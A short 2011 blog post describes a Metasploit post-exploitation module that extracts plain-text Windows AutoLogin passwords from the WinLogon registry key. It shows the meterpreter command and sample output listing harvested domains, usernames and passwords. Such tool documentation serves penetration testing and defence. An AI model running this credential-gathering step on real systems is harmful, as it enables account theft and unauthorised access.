Sunday, August 21, 2011

[Metasploit] Post | Windows Gather AutoLogin User Credential Extractor

This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2K till current Seven) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.

meterpreter > run post/windows/gather/credentials/windows_autologin

[*] Running against John-PC @ session 1
[+] DefaultDomain=DEPT_SALES, DefaultUser=john, DefaultPassword=pa55w0rd
[+] AltDomain=DEPT_HR, AltUser=jack, AltPassword=dr0w55p
[*] Storing data...
[*] Windows AutoLogin User Credentials saved in: /root/.msf4/loot/20110821034449_default_10.23.12.11_windows.autologi_460131.txt